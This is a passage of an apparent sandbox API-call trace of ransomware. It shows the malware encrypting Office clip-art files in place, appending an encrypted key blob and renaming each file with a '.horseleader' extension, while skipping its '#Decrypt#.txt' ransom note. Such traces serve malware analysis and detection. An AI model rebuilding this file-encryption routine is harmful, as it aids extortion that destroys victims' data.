returned 67 [0253.629] StrStrIW (lpFirst="BOATINST.WMF", lpSrch=".horseleader") returned 0x0 [0253.629] lstrcmpW (lpString1="BOATINST.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.629] lstrcmpW (lpString1="BOATINST.WMF", lpString2="_uninstalling_.png") returned 1 [0253.629] lstrlenW (lpString=".testttjffg") returned 11 [0253.629] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF", lpSrch=".testttjffg") returned 0x0 [0253.629] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.629] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.630] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 67 [0253.630] StrStrW (lpFirst="BOATINST.WMF", lpSrch=".txt") returned 0x0 [0253.630] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=29004) returned 1 [0253.630] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.633] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.633] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.634] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x214c, lpOverlapped=0x0) returned 1 [0253.634] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdeb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.634] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x214c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x214c, lpOverlapped=0x0) returned 1 [0253.635] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.635] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.635] WriteFile (in: hFile=0x158, 
lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.635] CloseHandle (hObject=0x158) returned 1 [0253.635] GetProcessHeap () returned 0x780000 [0253.635] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.635] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.horseleader") returned 79 [0253.635] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf.horseleader")) returned 1 [0253.636] GetProcessHeap () returned 0x780000 [0253.637] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.637] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77641800, ftCreationTime.dwHighDateTime=0x1bd4b2a, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77641800, ftLastWriteTime.dwHighDateTime=0x1bd4b2a, nFileSizeHigh=0x0, nFileSizeLow=0x532, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00076_.WMF", cAlternateFileName="")) returned 1 [0253.637] lstrcmpiW (lpString1="BS00076_.WMF", lpString2="Windows") returned -1 [0253.637] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 67 [0253.637] StrStrIW (lpFirst="BS00076_.WMF", 
lpSrch=".horseleader") returned 0x0 [0253.637] lstrcmpW (lpString1="BS00076_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.637] lstrcmpW (lpString1="BS00076_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.637] lstrlenW (lpString=".testttjffg") returned 11 [0253.637] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.637] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.637] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.637] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.639] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned 67 [0253.639] StrStrW (lpFirst="BS00076_.WMF", lpSrch=".txt") returned 0x0 [0253.639] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1330) returned 1 [0253.639] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x532, lpOverlapped=0x0) returned 1 [0253.641] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffface, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.641] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x532, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x532, 
lpOverlapped=0x0) returned 1 [0253.641] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.641] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.642] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.642] CloseHandle (hObject=0x158) returned 1 [0253.642] GetProcessHeap () returned 0x780000 [0253.642] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.642] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.horseleader") returned 79 [0253.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf.horseleader")) returned 1 [0253.643] GetProcessHeap () returned 0x780000 [0253.643] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.643] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfadcd00, ftCreationTime.dwHighDateTime=0x1bd4b2a, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfadcd00, ftLastWriteTime.dwHighDateTime=0x1bd4b2a, nFileSizeHigh=0x0, 
nFileSizeLow=0x5a4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00078_.WMF", cAlternateFileName="")) returned 1 [0253.643] lstrcmpiW (lpString1="BS00078_.WMF", lpString2="Windows") returned -1 [0253.643] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 67 [0253.643] StrStrIW (lpFirst="BS00078_.WMF", lpSrch=".horseleader") returned 0x0 [0253.643] lstrcmpW (lpString1="BS00078_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.644] lstrcmpW (lpString1="BS00078_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.644] lstrlenW (lpString=".testttjffg") returned 11 [0253.644] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.644] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.644] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.644] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.646] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF") returned 67 [0253.646] StrStrW (lpFirst="BS00078_.WMF", lpSrch=".txt") returned 0x0 [0253.646] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1444) returned 1 [0253.646] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0x5a4, lpOverlapped=0x0) returned 1 [0253.648] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.648] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5a4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5a4, lpOverlapped=0x0) returned 1 [0253.648] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.648] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.649] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.649] CloseHandle (hObject=0x158) returned 1 [0253.649] GetProcessHeap () returned 0x780000 [0253.649] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.649] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.horseleader") returned 79 [0253.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf.horseleader")) returned 1 [0253.650] GetProcessHeap () returned 0x780000 [0253.650] HeapFree (in: hHeap=0x780000, dwFlags=0x0, 
lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.650] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6395c300, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6395c300, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x1f26, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00092_.WMF", cAlternateFileName="")) returned 1 [0253.650] lstrcmpiW (lpString1="BS00092_.WMF", lpString2="Windows") returned -1 [0253.651] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 67 [0253.651] StrStrIW (lpFirst="BS00092_.WMF", lpSrch=".horseleader") returned 0x0 [0253.651] lstrcmpW (lpString1="BS00092_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.651] lstrcmpW (lpString1="BS00092_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.651] lstrlenW (lpString=".testttjffg") returned 11 [0253.651] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.651] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.651] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.651] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.652] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF") returned 67 [0253.652] StrStrW (lpFirst="BS00092_.WMF", lpSrch=".txt") returned 0x0 [0253.652] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7974) returned 1 [0253.652] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1f26, lpOverlapped=0x0) returned 1 [0253.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe0da, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.654] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1f26, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1f26, lpOverlapped=0x0) returned 1 [0253.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.654] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.655] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.655] CloseHandle (hObject=0x158) returned 1 [0253.655] GetProcessHeap () returned 0x780000 [0253.655] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.655] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.horseleader") returned 79 [0253.655] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf.horseleader")) returned 1 [0253.656] GetProcessHeap () returned 0x780000 [0253.656] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.656] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60023c00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60023c00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x94a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00100_.WMF", cAlternateFileName="")) returned 1 [0253.656] lstrcmpiW (lpString1="BS00100_.WMF", lpString2="Windows") returned -1 [0253.656] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 67 [0253.656] StrStrIW (lpFirst="BS00100_.WMF", lpSrch=".horseleader") returned 0x0 [0253.656] lstrcmpW (lpString1="BS00100_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.656] lstrcmpW (lpString1="BS00100_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.656] lstrlenW (lpString=".testttjffg") returned 11 [0253.656] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.656] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.656] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.656] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.657] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 67 [0253.657] StrStrW (lpFirst="BS00100_.WMF", lpSrch=".txt") returned 0x0 [0253.657] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2378) returned 1 [0253.657] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x94a, lpOverlapped=0x0) returned 1 [0253.659] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff6b6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.659] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x94a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x94a, lpOverlapped=0x0) returned 1 [0253.659] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.659] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.659] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.660] CloseHandle 
(hObject=0x158) returned 1 [0253.660] GetProcessHeap () returned 0x780000 [0253.660] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.660] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.horseleader") returned 79 [0253.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf.horseleader")) returned 1 [0253.661] GetProcessHeap () returned 0x780000 [0253.661] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.661] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c6eb500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5c6eb500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00135_.WMF", cAlternateFileName="")) returned 1 [0253.661] lstrcmpiW (lpString1="BS00135_.WMF", lpString2="Windows") returned -1 [0253.661] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 67 [0253.661] StrStrIW (lpFirst="BS00135_.WMF", lpSrch=".horseleader") returned 0x0 [0253.661] lstrcmpW (lpString1="BS00135_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.661] lstrcmpW (lpString1="BS00135_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.661] lstrlenW 
(lpString=".testttjffg") returned 11 [0253.661] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.661] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.661] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.661] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.661] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 67 [0253.661] StrStrW (lpFirst="BS00135_.WMF", lpSrch=".txt") returned 0x0 [0253.661] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1044) returned 1 [0253.662] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x414, lpOverlapped=0x0) returned 1 [0253.663] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.663] WriteFile 